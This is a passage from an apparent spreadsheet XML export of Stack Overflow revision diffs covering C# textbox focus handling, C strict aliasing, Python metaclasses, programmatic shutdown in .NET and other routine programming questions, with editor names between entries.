  &lt;p&gt; Also, &lt;strong&gt;calling .SelectAll() during the .Click event won't work&lt;/strong&gt; because the user won't be able to select any text with the mouse; the .SelectAll() call will keep overwriting the user's text selection.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When a C# &lt;span class="diff-add"&gt;WinForms&lt;/span&gt; text box receives focus, I want to select all the text in the textbox.&lt;/p&gt; _x000D_
 &lt;p&gt; To see what I mean, click in your web browser's address bar. See how all text was selected? I want to do that.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;FASTEST GUN ALERT: please read the following before answering!&lt;/strong&gt; Thanks guys. :-)&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Calling &lt;strong&gt;.SelectAll() during the .Enter or .GotFocus events won't work&lt;/strong&gt; because if the user clicked the textbox, the caret will be placed where he clicked, thus deselecting all text.&lt;/p&gt; _x000D_
  &lt;p&gt; Also, &lt;strong&gt;calling .SelectAll() during the .Click event won't work&lt;/strong&gt; because the user won't be able to select any text with the mouse; the .SelectAll() call will keep overwriting the user's text selection.&lt;span class="diff-add"&gt; )&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Judah Gabriel Himango</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When asking about &lt;a href="http://stackoverflow.com/questions/98340/what-are-the-common-undefinedunspecified-behavior-for-c-that-you-run-into"&gt;common undefined behavior in C&lt;/a&gt;, souls more enlightened than I referred to the strict aliasing rule.&lt;span class="diff-delete"&gt;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 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lt;/span&gt; What are they talking about?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When asking about &lt;a href="http://stackoverflow.com/questions/98340/what-are-the-common-undefinedunspecified-behavior-for-c-that-you-run-into"&gt;common undefined behavior in C&lt;/a&gt;, souls more enlightened than I referred to the strict aliasing rule.&lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt;&lt;br&gt; What are they talking about?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The best explanation I have found is by Mike Acton, &lt;a href="http://webcache.googleusercontent.com/search?q=cache:tcmeEkRF6GgJ:cellperformance.beyond3d.com/articles/2006/06/understanding-strict-aliasing.html+&amp;amp;cd=1&amp;amp;hl=en&amp;amp;ct=clnk&amp;amp;gl=us" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Understanding Strict Aliasing&lt;/span&gt;&lt;/a&gt;. It's focused a little on PS3 development, but that's basically just GCC.&lt;/p&gt; _x000D_
 &lt;p&gt; From the article:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; "Strict aliasing is an assumption, made by the C (or C++) compiler, that dereferencing pointers to objects of different types will never refer to the same memory location (i.e. alias each other.)"&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; So basically if you have an &lt;code&gt;int*&lt;/code&gt; pointing to some memory containing an &lt;code&gt;int&lt;/code&gt; and then you point a &lt;code&gt;float*&lt;/code&gt; to that memory and use it as a &lt;code&gt;float&lt;/code&gt; you break the rule. If your code does not respect this, then the compiler's optimizer will most likely break your code.&lt;/p&gt; _x000D_
 &lt;p&gt; The exception to the rule is a &lt;code&gt;char*&lt;/code&gt;, which is allowed to point to any type.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The best explanation I have found is by Mike Acton, &lt;a href="http://cellperformance.beyond3d.com/articles/2006/06/understanding-strict-aliasing.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Understanding Strict Aliasing&lt;/span&gt;&lt;/a&gt;. It's focused a little on PS3 development, but that's basically just GCC.&lt;/p&gt; _x000D_
 &lt;p&gt; From the article:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; "Strict aliasing is an assumption, made by the C (or C++) compiler, that dereferencing pointers to objects of different types will never refer to the same memory location (i.e. alias each other.)"&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; So basically if you have an &lt;code&gt;int*&lt;/code&gt; pointing to some memory containing an &lt;code&gt;int&lt;/code&gt; and then you point a &lt;code&gt;float*&lt;/code&gt; to that memory and use it as a &lt;code&gt;float&lt;/code&gt; you break the rule. If your code does not respect this, then the compiler's optimizer will most likely break your code.&lt;/p&gt; _x000D_
 &lt;p&gt; The exception to the rule is a &lt;code&gt;char*&lt;/code&gt;, which is allowed to point to any type.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Palec</t>
  </si>
  <si>
    <t>Antonio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.io.filestream.setlength.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;FileStream.SetLength&lt;/span&gt;&lt;/a&gt; is the one you want.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.io.filestream.setlength" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;FileStream.SetLength&lt;/span&gt;&lt;/a&gt; is the one you want.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jdphenix</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;What&lt;/span&gt; are metaclasses? What do you use them for? Concrete examples&lt;span class="diff-delete"&gt; would&lt;/span&gt; much appreciated!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I've mastered almost all the Python concepts (well, let's say they're just OO concepts :-)) but this one is tricky.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I know it has something to do with introspection but it's still unclear to me.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; So what&lt;/span&gt; are metaclasses? What do you use them for?&lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Concrete examples&lt;span class="diff-add"&gt;, including snippets,&lt;/span&gt; much appreciated!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>e-satis</t>
  </si>
  <si>
    <t>tshepang</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can get the drivers from the &lt;a href="https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?lang=en_US&amp;amp;source=swg-idsjs11" rel="nofollow noreferrer"&gt;IBM site&lt;/a&gt;. You will need to have IBM ID and password to login (which you can obtain &lt;a href="https://www.ibm.com/account/profile/us/en?page=reg" rel="nofollow noreferrer"&gt;here&lt;/a&gt;).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can get the drivers from the &lt;a href="https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?lang=en_US&amp;amp;source=swg-idsjs11" rel="nofollow noreferrer"&gt;IBM site&lt;/a&gt;. You will need to have IBM ID and password to login (which you can obtain &lt;a href="https://www.ibm.com/account/profile/us/en?page=reg" rel="nofollow noreferrer"&gt;here&lt;/a&gt;).&lt;span class="diff-add"&gt; Zip file is about 7 MBs, in contains DB2 9.5 JDBC and SQLJ drivers.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Das</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use one of the many tools designed specifically for this. One of them is &lt;a href="http://www.iwebtool.com/google_datacenter_search" rel="nofollow noreferrer"&gt;Google Datacenter Search at iWebTool&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;(It's really all about getting a list of data center IPs and sending the same GET variable to them as to google.com.)&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;edit&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; Here is a complete list of screencasts &lt;/span&gt;&lt;a href="http://www.dnrtv.com/archives.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://www.dnrtv.com/archives.aspx&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use one of the many tools designed specifically for this. One of them is &lt;a href="http://www.iwebtool.com/google_datacenter_search" rel="nofollow noreferrer"&gt;Google Datacenter Search at iWebTool&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;(It's really all about getting a list of data center IPs and sending the same GET variable to them as to google.com.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mendelt</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You'll get it as part of a Visual Studio install (if you included the SDK), or in a standalone SDK install. It'll live somewhere like&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;C:\program files\Microsoft Visual Studio 8\SDK\v2.0\Bin&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; or&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; If you don't already have it, you can download the .NET SDKs from&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/netframework/aa569263.aspx" rel="nofollow noreferrer"&gt;http://msdn.microsoft.com/en-us/netframework/aa569263.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You'll get it as part of a Visual Studio install (if you included the SDK), or in a standalone SDK install. It'll live somewhere like&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;C:\program files\Microsoft Visual Studio 8\SDK\v2.0\Bin&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; If you don't already have it, you can download the .NET SDKs from&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/netframework/aa569263.aspx" rel="nofollow noreferrer"&gt;http://msdn.microsoft.com/en-us/netframework/aa569263.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Chris F Carroll</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What makes a language a scripting language? I've heard some people say "when it gets interpreted instead of compiled". That would make PHP (for example) a scripting language. &lt;span class="diff-delete"&gt;Is&lt;/span&gt; that the only criterion? &lt;span class="diff-delete"&gt;Or&lt;/span&gt; are there other criteria?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What makes a language a scripting language? I've heard some people say "when it gets interpreted instead of compiled". That would make PHP (for example) a scripting language. &lt;span class="diff-add"&gt;It&lt;/span&gt; that the only criterion? &lt;span class="diff-add"&gt;or is it a coincidence, and&lt;/span&gt; are there other criteria?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Shog9</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the lesser-known but useful features of the Python programming language?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Try to limit answers to Python core&lt;/li&gt; _x000D_
  &lt;li&gt; One feature per answer&lt;/li&gt; _x000D_
  &lt;li&gt; Give an example and short description of the feature, not just a link to documentation&lt;/li&gt; _x000D_
  &lt;li&gt; Label the feature using bold title as the first line&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the lesser-known but useful features of the Python programming language?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Try to limit answers to Python core&lt;/li&gt; _x000D_
  &lt;li&gt; One feature per answer&lt;/li&gt; _x000D_
  &lt;li&gt; Give an example and short description of the feature, not just a link to documentation&lt;/li&gt; _x000D_
  &lt;li&gt; Label the feature using bold title as the first line&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; This question is along the lines of :&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/61088"&gt;&lt;span class="diff-add"&gt;Hidden Features of JavaScript&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/628407"&gt;&lt;span class="diff-add"&gt;Hidden Features of CSS&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/9033"&gt;&lt;span class="diff-add"&gt;Hidden Features of C#&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/102084"&gt;&lt;span class="diff-add"&gt;Hidden Features of VB.Net&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/15496"&gt;&lt;span class="diff-add"&gt;Hidden Features of Java&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/54929"&gt;&lt;span class="diff-add"&gt;Hidden Features of ASP.NET&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/605439"&gt;&lt;span class="diff-add"&gt;Hidden Features of TextPad&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/54886"&gt;&lt;span class="diff-add"&gt;Hidden Features of Eclipse&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/954327"&gt;&lt;span class="diff-add"&gt;Hidden Features of JavaScript&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/161872"&gt;&lt;span class="diff-add"&gt;Hidden Features of Perl&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/1025181/hidden-features-of-scala"&gt;&lt;span class="diff-add"&gt;Hidden Features of Scala&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/63998/hidden-features-of-ruby"&gt;&lt;span class="diff-add"&gt;Hidden Features of Ruby&lt;/span&gt;&lt;/a&gt;&lt;br&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>missingfaktor</t>
  </si>
  <si>
    <t>SilentGhost</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a setting in Resharper 4 (or even Visual Studio itself...) that forces a warning if I forget to wrap code in a &lt;code&gt;using&lt;/code&gt; block, or ommit the proper &lt;code&gt;&lt;span class="diff-delete"&gt;Dispose&lt;/span&gt;&lt;/code&gt; call in a &lt;code&gt;finally&lt;/code&gt; block?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a setting in Resharper 4 (or even Visual Studio itself...) that forces a warning if I forget to wrap code in a &lt;code&gt;using&lt;/code&gt; block, or ommit the proper &lt;span class="diff-add"&gt;Dispose&lt;/span&gt; call in a &lt;code&gt;finally&lt;/code&gt; block?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>serg10</t>
  </si>
  <si>
    <t>Shaun Austin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; First of all, thanks for answers! 9 total answers. Thank you.&lt;/p&gt; _x000D_
 &lt;p&gt; Bad news: all of the answers had some quirks or didn't work quite right (or at all). I've added a comment to each of your posts.&lt;/p&gt; _x000D_
 &lt;p&gt; Good news: I've found a way to make it work. This solution is pretty straightforward and seems to work in all the scenarios (mousing down, selecting text, tabbing focus, etc.)&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;bool alreadyFocused;_x000D_
_x000D_
..._x000D_
_x000D_
textBox1.GotFocus += textBox1_GotFocus;_x000D_
textBox1.MouseUp += textBox1_MouseUp;_x000D_
textBox1.Leave += textBox1_Leave;_x000D_
_x000D_
..._x000D_
_x000D_
void textBox1_Leave(object sender, EventArgs e)_x000D_
{_x000D_
    alreadyFocused = false;_x000D_
}_x000D_
_x000D_
_x000D_
void textBox1_GotFocus(object sender, EventArgs e)_x000D_
{_x000D_
    // Select all text only if the mouse isn't down._x000D_
    // This makes tabbing to the textbox give focus._x000D_
    if (MouseButtons == MouseButtons.None)_x000D_
    {_x000D_
        this.textBox1.SelectAll();_x000D_
        alreadyFocused = true;_x000D_
    }_x000D_
}_x000D_
_x000D_
void textBox1_MouseUp(object sender, MouseEventArgs e)_x000D_
{_x000D_
    // Web browsers like Google Chrome select the text on mouse up._x000D_
    // They only do it if the textbox isn't already focused,_x000D_
    // and if the user hasn't selected all text._x000D_
    if (!alreadyFocused &amp;amp;&amp;amp; this.textBox1.SelectionLength == 0)_x000D_
    {_x000D_
        alreadyFocused = true;_x000D_
        this.textBox1.SelectAll();_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; As far as I can tell, this causes a &lt;code&gt;&lt;span class="diff-delete"&gt;TextBox&lt;/span&gt;&lt;/code&gt; to behave exactly like a web browser's address bar.&lt;/p&gt; _x000D_
 &lt;p&gt; Hopefully this helps the next guy&lt;span class="diff-delete"&gt;/gal&lt;/span&gt; who tries to solve this deceptively simple problem.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks again, guys&lt;span class="diff-delete"&gt;/gals&lt;/span&gt;, for all your answers that helped lead me towards the correct path.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; First of all, thanks for answers! 9 total answers. Thank you.&lt;/p&gt; _x000D_
 &lt;p&gt; Bad news: all of the answers had some quirks or didn't work quite right (or at all). I've added a comment to each of your posts.&lt;/p&gt; _x000D_
 &lt;p&gt; Good news: I've found a way to make it work. This solution is pretty straightforward and seems to work in all the scenarios (mousing down, selecting text, tabbing focus, etc.)&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;bool alreadyFocused;_x000D_
_x000D_
..._x000D_
_x000D_
textBox1.GotFocus += textBox1_GotFocus;_x000D_
textBox1.MouseUp += textBox1_MouseUp;_x000D_
textBox1.Leave += textBox1_Leave;_x000D_
_x000D_
..._x000D_
_x000D_
void textBox1_Leave(object sender, EventArgs e)_x000D_
{_x000D_
    alreadyFocused = false;_x000D_
}_x000D_
_x000D_
_x000D_
void textBox1_GotFocus(object sender, EventArgs e)_x000D_
{_x000D_
    // Select all text only if the mouse isn't down._x000D_
    // This makes tabbing to the textbox give focus._x000D_
    if (MouseButtons == MouseButtons.None)_x000D_
    {_x000D_
        this.textBox1.SelectAll();_x000D_
        alreadyFocused = true;_x000D_
    }_x000D_
}_x000D_
_x000D_
void textBox1_MouseUp(object sender, MouseEventArgs e)_x000D_
{_x000D_
    // Web browsers like Google Chrome select the text on mouse up._x000D_
    // They only do it if the textbox isn't already focused,_x000D_
    // and if the user hasn't selected all text._x000D_
    if (!alreadyFocused &amp;amp;&amp;amp; this.textBox1.SelectionLength == 0)_x000D_
    {_x000D_
        alreadyFocused = true;_x000D_
        this.textBox1.SelectAll();_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; As far as I can tell, this causes a &lt;span class="diff-add"&gt;textbox&lt;/span&gt; to behave exactly like a web browser's address bar.&lt;/p&gt; _x000D_
 &lt;p&gt; Hopefully this helps the next guy who tries to solve this deceptively simple problem.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks again, guys, for all your answers that helped lead me towards the correct path.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the best way to shutdown the computer from a C# program?&lt;/p&gt; _x000D_
 &lt;p&gt; I've found a few methods that work - I'll post them below - but none of them are very elegant. I'm looking for something that's simpler and natively .net.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Note for 2015&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; On this very old question: the modern solution, Windows8+, is simply Micah Vertal's below.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the best way to shutdown the computer from a C# program?&lt;/p&gt; _x000D_
 &lt;p&gt; I've found a few methods that work - I'll post them below - but none of them are very elegant. I'm looking for something that's simpler and natively .net.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Bolu</t>
  </si>
  <si>
    <t>Fattie</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Works starting with windows XP, not available in win 2000 or lower:&lt;/p&gt; _x000D_
 &lt;p&gt; This is the quickest way to do it:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; VB.NET&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Process.Start("shutdown",&lt;span class="diff-delete"&gt;"/s /t 0");_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; C#&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;System.Diagnostics.Process.Start("shutdown", &lt;/span&gt;"/s /t 0");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Otherwise use P/Invoke or WMI like others have said.&lt;/p&gt; _x000D_
 &lt;p&gt; Edit: how to avoid creating a window&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var psi = new ProcessStartInfo("shutdown","/s /t 0");_x000D_
psi.CreateNoWindow = true;_x000D_
psi.UseShellExecute = false;_x000D_
Process.Start(psi);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Works starting with windows XP, not available in win 2000 or lower:&lt;/p&gt; _x000D_
 &lt;p&gt; This is the quickest way to do it:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Process.Start("shutdown","/s /t 0");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Otherwise use P/Invoke or WMI like others have said.&lt;/p&gt; _x000D_
 &lt;p&gt; Edit: how to avoid creating a window&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var psi = new ProcessStartInfo("shutdown","/s /t 0");_x000D_
psi.CreateNoWindow = true;_x000D_
psi.UseShellExecute = false;_x000D_
Process.Start(psi);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user4335407</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do you install Boost on MacOS? Right now I can't find bjam for the Mac.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; update: Thanks for the MacPorts answer, and special thanks to hasseg's comment for the link&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.macports.org/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://www.macports.org/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I'm still new to my Mac, but with ports it seems like we'll get going along much better.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do you install Boost on MacOS? Right now I can't find bjam for the Mac.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>MrTux</t>
  </si>
  <si>
    <t>Robert Gould</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; VB.&lt;span class="diff-delete"&gt;NET&lt;/span&gt; has a very handy "with" statement, but it also lets you use it on an unnamed variable, like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;With New FancyClass()_x000D_
    .Level = "SuperSpiffy"_x000D_
    .Style = Slimming_x000D_
    .Execute()_x000D_
End With_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is there a way to get at the "hidden" instance, so I can view it's properties in the &lt;span class="diff-delete"&gt;immediate&lt;/span&gt; window? &lt;span class="diff-delete"&gt;I&lt;/span&gt; doubt I'll get it in the watch windows, so immediate is fine.&lt;/p&gt; _x000D_
 &lt;p&gt; If you try to access the instance the same way (say, when &lt;code&gt;&lt;span class="diff-delete"&gt;.Execute()&lt;/span&gt;&lt;/code&gt; throws an exception) from the Immediate window, you get an error:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;? .Style_x000D_
'With' contexts and statements are not valid in debug windows._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is there any trick that can be used to get this, or do I have to convert the code to another style? &lt;span class="diff-delete"&gt;If&lt;/span&gt; With functioned more like a Using statement, &lt;span class="diff-delete"&gt;for example,&lt;/span&gt; "With v = New FancyClass()", this wouldn't pose a problem.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I know how with's work, what alternatives exist, what the compiler does, etc. &lt;span class="diff-delete"&gt;I&lt;/span&gt; just want to know if this is possible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; VB.&lt;span class="diff-add"&gt;Net&lt;/span&gt; has a&lt;span class="diff-add"&gt; the&lt;/span&gt; very handy "with" statement, but it also lets you use it on an unnamed variable, like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;With New FancyClass()_x000D_
    .Level = "SuperSpiffy"_x000D_
    .Style = Slimming_x000D_
    .Execute()_x000D_
